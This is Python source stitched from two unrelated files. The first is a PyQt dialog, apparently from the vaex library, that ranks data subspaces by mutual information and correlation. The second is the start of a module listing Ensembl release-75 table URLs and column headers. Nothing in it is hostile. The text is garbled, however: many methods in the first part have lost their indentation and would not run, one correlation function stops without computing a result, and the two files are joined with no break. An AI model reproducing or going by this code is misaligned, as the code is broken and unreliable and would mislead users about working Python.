        self.setSortingEnabled(True)

    def getSelected(self):
        """Return the list of pairs whose checkbox is currently checked."""
        selection = [checkbox.checkState() == QtCore.Qt.Checked for checkbox in self.checkboxes]
        selected_pairs = [pair for pair, selected in zip(self.pairs, selection) if selected]
        return selected_pairs

    def setQualities(self, pairs, qualities):
        """Replace the mutual-information values and refresh the table."""
        self.qualities = {}
        for quality, pair in zip(qualities, pairs):
            self.qualities[pair] = quality
        self.fill_table()

    def set_correlations(self, correlation_map):
        """Replace the correlation values and refresh the table."""
        self.correlation_map = dict(correlation_map)
        self.fill_table()

    def get_range(self, pair):
        """Return the stored (min, max) for *pair*, or (None, None) when missing.

        NOTE(review): indexes cells by position in self.pairs; with sorting or
        filtering active the row order can differ -- verify callers use this
        only on the unsorted 1d table.
        """
        index = self.pairs.index(pair)
        mi = self.item(index, 2)
        ma = self.item(index, 3)
        if mi is None or ma is None:
            return None, None
        return float(mi.data(QtCore.Qt.DisplayRole)), float(ma.data(QtCore.Qt.DisplayRole))

    def setRanges(self, pairs, ranges):
        """Write (min, max) values into columns 2/3 for the given pairs."""
        for (mi, ma), pair in zip(ranges, pairs):
            row = self.pairs.index(pair)
            item = QtGui.QTableWidgetItem()
            item.setText("%s" % mi)
            item.setData(QtCore.Qt.DisplayRole, float(mi))
            item.setFlags(self.defaultFlags)
            self.setItem(row, 2, item)
            item = QtGui.QTableWidgetItem()
            item.setText("%s" % ma)
            item.setData(QtCore.Qt.DisplayRole, float(ma))
            item.setFlags(self.defaultFlags)
            self.setItem(row, 3, item)

    def deselect(self, pair):
        """Uncheck the checkbox of *pair* (triggers stateChanged bookkeeping)."""
        index = self.pairs.index(pair)
        print(("deselect", pair, index))
        checkbox = self.checkboxes[index]
        checkbox.setCheckState(QtCore.Qt.Unchecked)

    def select(self, pair):
        """Check the checkbox of *pair* (triggers stateChanged bookkeeping)."""
        index = self.pairs.index(pair)
        print(("deselect", pair, index))
        checkbox = self.checkboxes[index]
        checkbox.setCheckState(QtCore.Qt.Checked)

    def setPairs(self, pairs):
        """Replace the displayed pairs, preserving known selection states."""
        self.pairs = list(pairs)
        for pair in self.pairs:
            if pair not in self.selected_dict:
                # BUG FIX: compare against "True" (as in __init__) so a stored
                # "False" actually deselects; previously the raw string was
                # stored and any non-empty string counted as selected
                self.selected_dict[pair] = self.properties.get(".".join(pair) + ".use", "True") == "True"
        self.filter_mask = np.array([True for pair in pairs])
        self.fill_table()

    def set_filter_terms(self, filter_terms):
        """Filter visible rows: a pair stays visible when every term occurs
        (case-insensitively) in at least one of its expressions."""
        def matches(pair):
            return all(any(term.lower() in expression.lower() for expression in pair)
                       for term in filter_terms)
        self.filter_terms = filter_terms
        self.filter_mask = np.array([matches(pair) for pair in self.pairs])
        self.queue_fill_table()  # debounced refresh
def joinpairs(pairs1d, pairsNd):
    """Yield candidate (N+1)-dimensional subspaces by prepending each 1d
    expression to each N-dimensional subspace.

    Combinations that would repeat an expression are skipped, and each set of
    expressions is yielded only once regardless of order (first occurrence
    wins). Yield order matches the input iteration order.

    :param pairs1d: iterable of 1-tuples of expression names
    :param pairsNd: iterable of N-tuples of expression names
    """
    seen = set()  # canonical (sorted) keys of already-yielded combinations; O(1) membership
    for pair1d in pairs1d:
        subspacename = pair1d[0]  # 1d entries are 1-tuples
        for pairNd in pairsNd:
            if subspacename in pairNd:
                continue  # would duplicate an axis
            pair = pair1d + pairNd
            key = tuple(sorted(pair))
            if key not in seen:
                seen.add(key)
                yield pair
class RankDialog(QtGui.QDialog):
    def __init__(self, dataset, parent, mainPanel, **options):
        """Build the ranking dialog for *dataset*.

        Options (all strings): ``grid_size`` (histogram grid for mutual
        information, default "32"), ``file`` (override the .properties path),
        ``open`` (contains "2"/"3"/"4" to auto-open those dimensions).
        Settings are persisted to a per-dataset .properties file.
        """
        super(RankDialog, self).__init__(parent)
        self.dataset = dataset
        self.mainPanel = mainPanel
        self.range_map = {}  # expression -> (min, max)
        self.grid_size = int(options.get("grid_size", "32"))
        # print "options", options
        self.properties = collections.OrderedDict()  # Properties()
        # resolve where the per-dataset settings file lives:
        # local datasets store next to the data file, remote ones under the private dir
        if self.dataset.is_local():
            self.properties_path = os.path.splitext(self.dataset.path)[0] + ".properties"
        else:
            dir = os.path.join(vaex.utils.get_private_dir(), "ranking")
            if not os.path.exists(dir):
                os.makedirs(dir)
            server = self.dataset.server
            name = "%s_%s_%s_%s" % (server.hostname, server.port, server.base_path.replace("/", "_"), self.dataset.name)
            self.properties_path = os.path.join(dir, name + ".properties")
        self.properties_path = options.get("file", self.properties_path)
        if os.path.exists(self.properties_path):
            self.load_properties()
        else:
            pass
            # if not os.access(properties_path, os.W_OK):
            # dialog_error(self, "File access", "Cannot write to %r, so cannot save options" % properties_path)
        # --- 1d tab: one row per column/expression ---
        self.tabs = QtGui.QTabWidget(self)
        self.tab1d = QtGui.QWidget(self.tabs)
        self.table1d = SubspaceTable(self, self.tab1d, mainPanel, self.dataset, list(itertools.combinations(unique_column_names(self.dataset), 1)), 1, self.properties)
        self.subspaceTables = {}  # dim -> SubspaceTable
        self.subspaceTabs = {}    # dim -> tab widget
        self.subspaceTables[1] = self.table1d
        self.subspaceTabs[1] = self.tab1d

        def onclick(dim=2):
            self.open(dim=dim)
        self.subspace2d = QtGui.QPushButton("create 2d subspaces", self.tab1d)
        self.subspace2d.clicked.connect(functools.partial(onclick, dim=2))
        # --- min/max calculation dropdown ---
        self.get_ranges_menu = QtGui.QMenu()
        self.button_get_ranges = QtGui.QToolButton()
        self.button_get_ranges.setText("calculate min/max")
        self.button_get_ranges.setPopupMode(QtGui.QToolButton.InstantPopup)
        # self.button_get_ranges.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
        self.get_ranges_menu = QtGui.QMenu()
        self.button_get_ranges.setMenu(self.get_ranges_menu)
        self.action_ranges_minmax = QtGui.QAction("absolute min/max", self)
        self.action_ranges_minmax_3sigma = QtGui.QAction("3 sigma clipping", self)
        self.get_ranges_menu.addAction(self.action_ranges_minmax)
        self.get_ranges_menu.addAction(self.action_ranges_minmax_3sigma)
        # self.button_get_ranges = QtGui.QToolButton(self.tab1d)
        # self.button_get_ranges.setText("calculate min/max")
        # self.button_get_ranges.setM
        self.action_ranges_minmax.triggered.connect(self.onCalculateMinMax)
        self.action_ranges_minmax_3sigma.triggered.connect(self.onCalculateMinMax3Sigma)
        self.button_store = QtGui.QToolButton(self.tab1d)
        self.button_store.setText("store")
        self.button_store.clicked.connect(self.onStore)
        # --- "Extra" actions dropdown ---
        self.actions_menu = QtGui.QMenu()
        self.button_actions = QtGui.QToolButton()
        self.button_actions.setText("Extra")
        self.button_actions.setPopupMode(QtGui.QToolButton.InstantPopup)
        self.button_actions.setMenu(self.actions_menu)
        self.action_select_all = QtGui.QAction("Select all", self)
        self.action_select_none = QtGui.QAction("Select none", self)
        self.action_remove_empty = QtGui.QAction("Remove empty columns", self)
        self.action_pca = QtGui.QAction("PCA transformation", self)
        self.action_select_all.triggered.connect(self.onSelectAll)
        self.action_select_none.triggered.connect(self.onSelectNone)
        self.action_remove_empty.triggered.connect(self.onRemoveEmpty)
        self.action_pca.triggered.connect(self.onPca)
        self.actions_menu.addAction(self.action_select_all)
        self.actions_menu.addAction(self.action_select_none)
        self.actions_menu.addAction(self.action_remove_empty)
        self.actions_menu.addSeparator()
        self.actions_menu.addAction(self.action_pca)
        # --- layout of the 1d tab ---
        self.tab1dlayout = QtGui.QVBoxLayout(self)
        self.tab1d_button_layout = QtGui.QHBoxLayout(self)
        self.tab1dlayout.addLayout(self.tab1d_button_layout)
        self.tab1d_button_layout.addWidget(self.subspace2d)
        self.tab1d_button_layout.addWidget(self.button_get_ranges)
        self.tab1d_button_layout.addWidget(self.button_store)
        self.tab1d_button_layout.addWidget(self.button_actions)
        self.filter_line_edit = QtGui.QLineEdit(self)
        self.filter_line_edit.setPlaceholderText("Enter space seperated search terms")
        self.filter_line_edit.textEdited.connect(functools.partial(self.onFilter, table=self.table1d))
        self.tab1dlayout.addWidget(self.filter_line_edit)
        self.tab1dlayout.addWidget(self.table1d)
        # self.tab1dlayout.addWidget(self.rankButton)
        # self.setCentralWidget(self.splitter)
        self.tab1d.setLayout(self.tab1dlayout)
        self.tabs.addTab(self.tab1d, "1d")
        self.resize(700, 500)
        if 0:  # dead code: list-widget based column view, kept for reference
            for name in self.dataset.column_names:
                item = QtGui.QListWidgetItem(self.list1d)
                item.setText(name)
                item.setCheckState(False)
                # self.list1d.
        # --- top-level layout: options grid + tabs ---
        self.boxlayout = QtGui.QVBoxLayout(self)
        self.gridlayout = QtGui.QGridLayout()
        self.gridlayout.setColumnStretch(1, 1)
        self.gridlayout.setSpacing(0)
        self.gridlayout.setContentsMargins(2, 1, 2, 1)
        self.gridlayout.setAlignment(QtCore.Qt.AlignTop)
        row = 1
        self.selection_label = QtGui.QLabel("Use for computations:", self)
        self.gridlayout.addWidget(self.selection_label, row, 0)
        self.radio_button_all = QtGui.QRadioButton("Complete dataset", self)
        self.radio_button_selection = QtGui.QRadioButton("Selection", self)
        self.radio_button_all.setChecked(True)
        self.gridlayout.addWidget(self.radio_button_all, row, 1)
        row += 1
        self.gridlayout.addWidget(self.radio_button_selection, row, 1)
        row += 1

        # getter/setter pair for the grid-size Option widget
        def get():
            return str(self.grid_size)

        def set(value):
            self.grid_size = int(value)
        self.option_grid_size = Option(self, "grid size (for mutual info)", "32 64 128 256".split(), get, set)
        row = self.option_grid_size.add_to_grid_layout(row, self.gridlayout)
        # self.gridlayout.addWidget(self.option_grid_size.combobox); row += 1
        # self.gridlayout.addWidget(self.option_grid_size.combobox); row += 1
        self.boxlayout.addLayout(self.gridlayout)
        self.boxlayout.addWidget(self.tabs)
        # self.boxlayout.addWidget(self.rankButton)
        # self.setCentralWidget(self.splitter)
        self.setLayout(self.boxlayout)
        # auto-open higher-dimensional tabs when requested via options
        if "2" in options.get("open", ""):
            self.open(dim=2)
        if "3" in options.get("open", ""):
            self.open(dim=3)
        if "4" in options.get("open", ""):
            self.open(dim=4)
        self.fill_range_map()
    def open(self, dim=2):
        """Open (or refresh) the tab listing *dim*-dimensional subspaces.

        The candidate pairs are built by joining the selected 1d expressions
        with the selected (dim-1)-dimensional subspaces. If the tab already
        exists only its pair list is updated.

        NOTE(review): shadows the builtin ``open`` as a method name; harmless
        here but worth noting.
        """
        pairs1d = self.subspaceTables[1].getSelected()
        pairsprevd = self.subspaceTables[dim - 1].getSelected()
        # print pairs1d
        # print pairsprevd
        newpairs = list(joinpairs(pairs1d, pairsprevd))
        print(("newpairs", newpairs))
        if dim not in self.subspaceTables:
            # first time: build the tab, its table, buttons and menus
            self.tabNd = QtGui.QWidget(self.tabs)
            self.tableNd = SubspaceTable(self, self.tabNd, self.mainPanel, self.dataset, newpairs, dim, self.properties)
            self.tabNdlayout = QtGui.QVBoxLayout(self)
            self.tabNdButtonLayout = QtGui.QHBoxLayout(self)
            self.subspaceNd = QtGui.QPushButton("Create %dd subspaces" % (dim + 1), self.tab1d)
            self.plotNd = QtGui.QPushButton("Rank plot")
            self.exportNd = QtGui.QPushButton("Export ranking")
            if dim == len(self.dataset.column_names):
                # cannot go higher than the number of columns
                self.subspaceNd.setDisabled(True)
            self.menu_calculate = QtGui.QMenu()
            self.button_calculate = QtGui.QToolButton()
            self.button_calculate.setText("Calculate")
            self.button_calculate.setPopupMode(QtGui.QToolButton.InstantPopup)
            # self.button_get_ranges.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
            self.button_calculate.setMenu(self.menu_calculate)
            self.tabNdButtonLayout.addWidget(self.subspaceNd)
            self.tabNdButtonLayout.addWidget(self.button_calculate)
            # self.tabNdButtonLayout.addWidget(self.miNd)
            # self.tabNdButtonLayout.addWidget(self.correlationNd)
            self.tabNdButtonLayout.addWidget(self.exportNd)
            self.tabNdButtonLayout.addWidget(self.plotNd)
            self.tabNdlayout.addLayout(self.tabNdButtonLayout)
            self.subspaceNd.clicked.connect(functools.partial(self.open, dim=dim + 1))
            self.exportNd.clicked.connect(functools.partial(self.export, table=self.tableNd))
            self.plotNd.clicked.connect(functools.partial(self.rank_plot, table=self.tableNd))
            self.action_calculate_mi = QtGui.QAction("Calculate mutual information", self)
            self.action_calculate_correlation = QtGui.QAction("Calculate correlation", self)
            self.action_calculate_mi.triggered.connect(functools.partial(self.rankSubspaces, table=self.tableNd))
            self.action_calculate_correlation.triggered.connect(functools.partial(self.calculate_correlation, table=self.tableNd))
            self.menu_calculate.addAction(self.action_calculate_mi)
            self.menu_calculate.addAction(self.action_calculate_correlation)
            # rank-correlation submenus (currently disabled below)
            self.action_calculate_rank_correlation_MI_corr_kendall = QtGui.QAction("MI - correlation", self)
            self.action_calculate_rank_correlation_MI_abs_corr_kendall = QtGui.QAction("MI - abs(correlation)", self)
            self.action_calculate_rank_correlation_MI_corr_spearman = QtGui.QAction("MI - correlation", self)
            self.action_calculate_rank_correlation_MI_abs_corr_spearman = QtGui.QAction("MI - abs(correlation)", self)
            self.menu_correlation_kendall = self.menu_calculate.addMenu("Kendall's rank correlation")
            self.menu_correlation_spearman = self.menu_calculate.addMenu("Spearman's rank correlation")
            # NOTE(review): both submenus are disabled -- the implementations
            # below are unfinished; re-enable once they are complete
            self.menu_correlation_kendall.setEnabled(False)
            self.menu_correlation_spearman.setEnabled(False)
            self.menu_correlation_kendall.addAction(self.action_calculate_rank_correlation_MI_corr_kendall)
            self.menu_correlation_kendall.addAction(self.action_calculate_rank_correlation_MI_abs_corr_kendall)
            self.menu_correlation_spearman.addAction(self.action_calculate_rank_correlation_MI_corr_spearman)
            self.menu_correlation_spearman.addAction(self.action_calculate_rank_correlation_MI_abs_corr_spearman)
            self.action_calculate_rank_correlation_MI_corr_kendall.triggered.connect(functools.partial(self.calculate_rank_correlation_kendall, table=self.tableNd))
            self.action_calculate_rank_correlation_MI_abs_corr_kendall.triggered.connect(functools.partial(self.calculate_rank_correlation_kendall, table=self.tableNd, absolute=True))
            self.action_calculate_rank_correlation_MI_corr_spearman.triggered.connect(functools.partial(self.calculate_rank_correlation_spearman, table=self.tableNd))
            self.action_calculate_rank_correlation_MI_abs_corr_spearman.triggered.connect(functools.partial(self.calculate_rank_correlation_spearman, table=self.tableNd, absolute=True))

            # debug helpers: trace selection-related signals
            def func(index, name=""):
                print((name, index.row(), index.column()))
            self.tableNd.pressed.connect(functools.partial(func, name="pressed"))
            self.tableNd.entered.connect(functools.partial(func, name="entered"))
            self.tableNd.clicked.connect(functools.partial(func, name="clicked"))
            self.tableNd.activated.connect(functools.partial(func, name="activated"))

            def func(index, previous, name=""):
                print((name, index.row(), index.column(), previous.row(), previous.column()))
            self.selectionModel = self.tableNd.selectionModel()
            self.selectionModel.currentChanged.connect(functools.partial(func, name="currentChanged"))
            self.filter_Nd_line_edit = QtGui.QLineEdit(self)
            self.filter_Nd_line_edit.setPlaceholderText("Enter space seperated search terms")
            self.filter_Nd_line_edit.textEdited.connect(functools.partial(self.onFilter, table=self.tableNd))
            self.tabNdlayout.addWidget(self.filter_Nd_line_edit)
            self.tabNdlayout.addWidget(self.tableNd)
            # self.tab1dlayout.addWidget(self.rankButton)
            # self.setCentralWidget(self.splitter)
            self.tabNd.setLayout(self.tabNdlayout)
            self.subspaceTables[dim] = self.tableNd
            self.subspaceTabs[dim] = self.tabNd
            self.tabs.addTab(self.tabNd, "%dd" % dim)
            self.tabs.setCurrentWidget(self.tabNd)
        else:
            # tab exists: refresh its pair list and bring it to the front
            self.subspaceTables[dim].setPairs(newpairs)
            self.tabs.setCurrentWidget(self.subspaceTabs[dim])
    def onPca(self):
        """Placeholder for the 'PCA transformation' action; not implemented yet."""
        # vaex.pca.
        pass
def onFilter(self, text, table):
table.set_filter_terms(text.split())
    def onStore(self):
        """Persist the 1d table's selection state and ranges to the .properties file.

        Writes "<expr>.use" (repr of a bool) for every pair, plus "<expr>.min"
        and "<expr>.max" when a range is known, then informs the user.
        """
        selected_pairs = self.table1d.getSelected()
        # error = False
        for pair in self.table1d.pairs:
            key = str(pair[0])
            # print repr(key+".use"), repr(pair in selected_pairs)
            self.properties[key + ".use"] = repr(pair in selected_pairs)
            if key in self.range_map:
                mi, ma = self.range_map[key]
                self.properties[key + ".min"] = repr(mi)
                self.properties[key + ".max"] = repr(ma)
            else:
                # range never computed for this expression; stored without min/max
                print(("min/max not present", key))
        print(("save to", self.properties_path))
        self.store_properties()
        dialog_info(self, "Stored", "Stored configuration to: %r" % self.properties_path)
def load_properties(self):
with open(self.properties_path, "rb") as f:
self.properties = jprops.load_properties(f, collections.OrderedDict)
def store_properties(self):
with open(self.properties_path, "wb") as f:
jprops.store_properties(f, self.properties)
def fill_range_map(self):
pairs = self.table1d.getSelected()
for pair in pairs:
mi, ma = self.table1d.get_range(pair)
if mi is not None and ma is not None:
self.range_map[pair[0]] = mi, ma
def onSelectAll(self):
pairs = self.table1d.pairs
for pair in pairs:
self.table1d.select(pair)
def onSelectNone(self):
pairs = self.table1d.pairs
for pair in pairs:
self.table1d.deselect(pair)
def onRemoveEmpty(self):
self.fill_range_map()
pairs = self.table1d.getSelected()
error = False
for pair in pairs:
print(pair)
if pair[0] in self.range_map:
min, max = self.range_map[pair[0]]
if min == max:
print((pair, "empty", min, max))
self.table1d.deselect(pair)
else:
if not error: # only give a warning once
dialog_error(self, "Min/max missing", "Min max missing for %s" % pair)
error = True
def onCalculateMinMax(self):
pairs = self.table1d.getSelected()
logger.debug("estimate min/max for %r" % pairs)
if self.dataset.is_local():
executor = vaex.execution.Executor(buffer_size=buffer_size)
else:
executor = vaex.remote.ServerExecutor()
expressions = [pair[0] for pair in pairs]
assert len(pairs[0]) == 1
self.range_map = {}
try:
with dialogs.ProgressExecution(self, "Calculating min/max", executor=executor) as progress:
subspace = self.dataset.subspace(*expressions, executor=executor, delay=True)
minmax = subspace.minmax()
progress.add_task(minmax).end()
progress.execute()
ranges = minmax.get()
self.table1d.setRanges(pairs, ranges)
self.fill_range_map()
except:
logger.exception("Error in min/max or cancelled")
# dialog.hide()
def onCalculateMinMax3Sigma(self):
pairs = self.table1d.getSelected()
expressions = [pair[0] for pair in pairs]
if self.dataset.is_local():
executor = vaex.execution.Executor(buffer_size=buffer_size)
else:
executor = vaex.remote.ServerExecutor()
if self.dataset.is_local():
executor = vaex.execution.Executor()
else:
executor = vaex.remote.ServerExecutor()
subspace = self.dataset.subspace(*expressions, executor=executor, delay=True)
means = subspace.mean()
with dialogs.ProgressExecution(self, "Calculating mean", executor=executor) as progress:
progress.add_task(means).end()
progress.execute()
logger.debug("get means")
means = means.get()
logger.debug("got means")
vars = subspace.var(means=means)
with dialogs.ProgressExecution(self, "Calculating variance", executor=executor) as progress:
progress.add_task(vars).end()
progress.execute()
# limits = limits.get()
vars = vars.get()
stds = vars**0.5
sigmas = 3
ranges = list(zip(means - sigmas * stds, means + sigmas * stds))
self.table1d.setRanges(pairs, ranges)
self.fill_range_map()
def calculate_rank_correlation_kendall(self, table, absolute=False):
print(("kendall", table, absolute))
pairs = table.getSelected()
mi_values = [table.qualities[pair] for pair in pairs]
correlation_values = [table.correlation_map[pair] for pair in pairs]
ranking_mi = np.argsort(mi_values)
if absolute:
ranking_correlation = np.argsort(np.abs(correlation_values))
else:
ranking_correlation = np.argsort(correlation_values)
N = len(pairs)
A = np.zeros((N, N))
B = np.zeros((N, N))
for i in range(N):
for j in range(N):
A[i, j] = np.sign(ranking_mi[i] - ranking_mi[j])
B[i, j] = np.sign(ranking_correlation[i] - ranking_correlation[j])
AB = 0
AA = 0
BB = 0
for i in range(N):
for j in range(N):
AB += A[i, j] * B[i, j]
AA += A[i, j]**2
BB += B[i, j]**2
    def calculate_rank_correlation_spearman(self, table, absolute=False):
        """Placeholder: Spearman rank correlation between the MI and correlation
        rankings is not implemented yet (the menu entry is disabled)."""
        print(("spearman", table, absolute))
def calculate_correlation(self, table):
print(("calculate correlation for ", table))
pairs = table.getSelected()
expressions = set()
for pair in pairs:
for expression in pair:
expressions.add(expression)
expressions = list(expressions)
if self.dataset.is_local():
executor = vaex.execution.Executor(buffer_size=buffer_size)
else:
executor = vaex.remote.ServerExecutor()
def on_error(exc):
raise exc
if 1:
# subspace = self.dataset(*expressions, executor=executor, delay=True)
subspaces = self.dataset.subspaces(pairs, executor=executor, delay=True)
means_promise = subspaces.mean()
# print means_promise, type(means_promise), subs
with dialogs.ProgressExecution(self, "Calculating means", executor=executor) as progress:
progress.add_task(means_promise)
progress.execute()
means = means_promise.get()
variances_promise = subspaces.var(means=means)
with dialogs.ProgressExecution(self, "Calculating variances", executor=executor) as progress:
progress.add_task(variances_promise)
progress.execute()
vars = variances_promise.get()
# means = subspaces._unpack(means_packed)
# vars = subspaces._unpack(vars_packed)
tasks = []
with dialogs.ProgressExecution(self, "Calculating correlation", executor=executor) as progress:
for subspace, mean, var in zip(subspaces.subspaces, means, vars):
task = subspace.correlation(means=mean, vars=var)
progress.add_task(task).end()
tasks.append(task)
progress.execute()
correlations = [task.get() for task in tasks]
correlation_map = dict(zip(pairs, correlations))
table.set_correlations(correlation_map)
return
# mean_map = dict(zip(expressions, means))
# var_map = dict(zip(expressions, variances))
else:
mean_map = {}
def on_error(exc):
raise exc
for expression in expressions:
subspace = self.dataset(expression, executor=executor, delay=True)
def assign(mean_list, expression=expression):
logger.debug("assigning %r to %s", mean_list, expression)
mean_map[expression] = mean_list
subspace.mean().then(assign, on_error).end()
with dialogs.ProgressExecution(self, "Calculating means", executor=executor):
executor.execute()
var_map = {}
for expression in expressions:
subspace = self.dataset(expression, executor=executor, delay=True)
def assign(mean_list, expression=expression):
logger.debug("assigning %r to %s", mean_list, expression)
var_map[expression] = mean_list[0].tolist()
subspace.var(means=mean_map[expression]).then(assign, on_error).end()
with dialogs.ProgressExecution(self, "Calculating variances", executor=executor):
executor.execute()
means = [mean_map[expressions[0]] for expressions in pairs]
variances = [var_map[expressions[0]] for expressions in pairs]
correlation_map = {}
for pair in pairs:
means = [mean_map[expression] for expression in pair]
vars = [var_map[expression] for expression in pair]
subspace = self.dataset(*pair, executor=executor, delay=True)
def assign(correlation, pair=pair):
logger.debug("assigning %r to %s", correlation, pair)
correlation_map[pair] = correlation
subspace.correlation(means, vars).then(assign, on_error).end()
with dialogs.ProgressExecution(self, "Calculating correlation", executor=executor):
executor.execute()
table.set_correlations(correlation_map)
return
jobsManager = vaex.dataset.JobsManager()
expressions = set()
for pair in pairs:
for expression in pair:
expressions.add(expression)
expressions = list(expressions)
print("means")
with ProgressExecution(self, "Calculating means") as progress:
means = jobsManager.calculate_mean(self.dataset, use_mask=self.radio_button_selection.isChecked(), expressions=expressions, feedback=progress.progress)
mean_map = dict(list(zip(expressions, means)))
centered_expressions_map = {expression: "(%s - %.20e)" % (expression, mean) for (expression, mean) in list(mean_map.items())}
variances_expressions_map = {expression: "%s**2" % centered_expressions for expression, centered_expressions in list(centered_expressions_map.items())}
with ProgressExecution(self, "Calculating variances") as progress:
variances = jobsManager.calculate_mean(self.dataset, use_mask=self.radio_button_selection.isChecked(), expressions=list(variances_expressions_map.values()), feedback=progress.progress)
variances_map = dict(list(zip(list(variances_expressions_map.keys()), variances)))
covariances_expressions = []
for pair in pairs:
centered_expressions = [centered_expressions_map[expression] for expression in pair]
covariance_expression = "*".join(centered_expressions)
covariances_expressions.append(covariance_expression)
print(covariances_expressions)
with ProgressExecution(self, "Calculating covariances") as progress:
# progress.progress(20)
covariances = jobsManager.calculate_mean(self.dataset, use_mask=self.radio_button_selection.isChecked(), expressions=covariances_expressions, feedback=progress.progress)
# progress.progress(20)
print(variances)
print(covariances)
correlation_map = {}
for pair, covariance in zip(pairs, covariances):
normalization = 1
for expression in pair:
normalization *= np.sqrt(variances_map[expression])
correlation_map[pair] = covariance / normalization
table.set_correlations(correlation_map)
return
def export(self, table):
    # Export the ranking results of *table* — mutual information and
    # correlation coefficient per expression pair, plus the min/max range
    # of every expression involved — to a Java-style .properties file.
    print(("export", table))
    basename, ext = os.path.splitext(self.dataset.path)
    # e.g. <dataset>-ranking-2d.properties for 2-dimensional pairs
    path = basename + ("-ranking-%dd" % table.dim) + ".properties"
    filename = get_path_save(self, path=path, title="Export ranking", file_mask="properties file *.properties")
    expressions = set()
    if filename:  # the user may cancel the save dialog
        counts = 0
        with open(filename, "w") as file:
            for pair in table.pairs:
                # only write the measures that were actually computed
                if pair in table.qualities:
                    file.write("%s.mutual_information=%f\n" % (".".join(pair), table.qualities[pair]))
                    counts += 1
                if pair in table.correlation_map:
                    file.write("%s.correlation_coefficient=%f\n" % (".".join(pair), table.correlation_map[pair]))
                    counts += 1
                # collect every expression seen so its range is written once
                expressions.update(pair)
            for expression in expressions:
                mi, ma = self.range_map[expression]
                file.write("%s.min=%f\n" % (expression, mi))
                file.write("%s.max=%f\n" % (expression, ma))
        dialog_info(self, "Wrote ranking file", "wrote %d lines" % counts)
def rankSubspaces(self, table):
    """Compute the mutual information of every selected expression pair
    and store the results in *table*.

    Requires a min/max range for each involved expression (filled in by
    ``fill_range_map``); shows an error dialog and aborts when any range
    is missing.  Aborts silently when the user cancels the progress
    dialog.
    """
    self.fill_range_map()
    pairs = table.getSelected()
    # Validate that every expression has a known range before scheduling work.
    error = False
    for pair in pairs:
        for expression in pair:
            if expression not in self.range_map:
                error = True
                print(("missing", expression))
    if error:
        dialog_error(self, "Missing min/max", "Please calculate the minimum and maximum for the dimensions")
        return
    # Local datasets get a buffered executor; remote ones delegate to the server.
    if self.dataset.is_local():
        executor = vaex.execution.Executor(buffer_size=buffer_size)
    else:
        executor = vaex.remote.ServerExecutor()
    tasks = []
    with dialogs.ProgressExecution(self, "Calculating mutual information", executor=executor) as progress:
        for pair in pairs:
            limits = [self.range_map[expr] for expr in pair]
            task = self.dataset(*pair, executor=executor, delay=True).mutual_information(limits=limits, size=self.grid_size)
            progress.add_task(task).end()
            tasks.append(task)
        # execute() returns falsy when the user cancelled; nothing to report then.
        if not progress.execute():
            return
    logger.debug("get means")
    mutual_information = [task.get() for task in tasks]
    table.setQualities(pairs, mutual_information)
    # NOTE: legacy KLD-based implementation that followed an unconditional
    # `return` here (dead code, including `if 0:` blocks) has been removed.
def rank_plot(self, table):
    """Open a RankPlot window visualizing the ranking *table*."""
    RankPlot(self, table).show()
|
|
# Copyright (c) 2014. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os.path import exists
import hashlib
import base64
import logging
import pandas as pd
import datacache
from datacache import build_path
def fetch_file(url, decompress=True):
    """Download *url* into the local "immuno" cache directory via datacache.

    Returns the path of the (optionally decompressed) cached file.
    """
    return datacache.fetch_file(url, subdir="immuno", decompress=decompress)
# Chromosome names kept by default when filtering Ensembl rows:
# autosomes 1-22, the sex chromosomes and mitochondrial DNA.
STANDARD_CONTIGS = set([
    '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14',
    '15', '16', '17', '18', '19', '20', '21', '22', 'X', 'Y', 'M'
])

# The URLs below point at raw Ensembl release-75 (GRCh37) MySQL table dumps.
# The dumps are header-less TSV files, so each table's column names are
# spelled out in the *_HEADER lists (column meanings presumably follow the
# Ensembl core schema — verify against the Ensembl schema docs).

# gene.txt: one row per gene annotation.
GENE_HEADER = [
    'gene_id', 'biotype', 'analysis_id',
    'seq_region_id', 'seq_region_start', 'seq_region_end',
    'seq_region_strand', 'display_xref_id',
    'source', 'status', 'description', 'is_current',
    'canonical_transcript_id', 'stable_id',
    'version', 'created_date', 'modified_date'
]
GENE_DATA_URL = \
    "ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/gene.txt.gz"

# seq_region.txt: maps internal seq_region_id to contig/chromosome names.
SEQ_REGION_HEADER = ['seq_region_id', 'name', 'coord_system_id']
SEQ_REGION_DATA_URL = \
    "ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/seq_region.txt.gz"

# exon.txt: one row per exon, with genomic coordinates and phase info.
EXON_HEADER = [
    "exon_id", "seq_region_id", "seq_region_start",
    "seq_region_end", "seq_region_strand", "phase", "end_phase",
    "is_current", "is_constitutive", "stable_id", "version",
    "created_date", "modified_date"
]
EXON_DATA_URL = \
    "ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/exon.txt.gz"

# transcript.txt: one row per transcript, linked to its gene.
TRANSCRIPT_HEADER = [
    "transcript_id", "gene_id", "analysis_id",
    "seq_region_id", "seq_region_start", "seq_region_end",
    "seq_region_strand", "display_xref_id", "source", "biotype", "status",
    "description", "is_current", "canonical_translation_id", "stable_id",
    "version", "created_date", "modified_date"
]
TRANSCRIPT_DATA_URL = \
    "ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/transcript.txt.gz"

# exon_transcript.txt: many-to-many join table between exons and
# transcripts, with the exon's rank (order) within the transcript.
EXON_TRANSCRIPT_DATA_URL = \
    "ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/exon_transcript.txt.gz"

# translation.txt: coding-region information (start/end exons and offsets)
# for protein-coding transcripts.
TRANSLATION_HEADER = [
    "translation_id", "transcript_id", "seq_start",
    "start_exon_id", "seq_end", "end_exon_id",
    "stable_id","version", "created_date", "modified_date"
]
TRANSLATION_DATA_URL = \
    "ftp://ftp.ensembl.org/pub/release-75/mysql/homo_sapiens_core_75_37/translation.txt.gz"
